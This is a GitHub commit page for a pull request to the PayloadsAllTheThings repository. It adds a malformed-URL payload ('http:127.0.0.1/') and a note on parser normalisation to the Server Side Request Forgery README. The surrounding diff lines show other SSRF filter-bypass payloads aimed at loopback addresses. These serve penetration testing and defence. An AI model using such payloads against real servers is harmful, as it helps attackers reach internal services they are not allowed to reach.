Skip to content

Commit 45661ef

Browse files
swisskyreposwisskyrepo
authored
Merge pull request swisskyrepo#809 from HackingRepo/patch-2
Update README with URL parsing examples
2 parents cd54869 + c975f61 commit 45661ef

File tree

1 file changed

+2
-0
lines changed

1 file changed

+2
-0
lines changed

Server Side Request Forgery/README.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -266,6 +266,7 @@ http://127.1.1.1:80\@127.2.2.2:80/
266266
http://127.1.1.1:80\@@127.2.2.2:80/
267267
http://127.1.1.1:80:\@@127.2.2.2:80/
268268
http://127.1.1.1:80#\@127.2.2.2:80/
269+
http:127.0.0.1/
269270
```
270271

271272
![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)
@@ -275,6 +276,7 @@ Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/`
275276
* `urllib2` treats `1.1.1.1` as the destination
276277
* `requests` and browsers redirect to `2.2.2.2`
277278
* `urllib` resolves to `3.3.3.3`
279+
* Some parsers replace http:127.0.0.1/ to http://127.0.0.1/
278280

279281
### Bypass PHP filter_var() Function
280282

0 commit comments

Comments
 (0)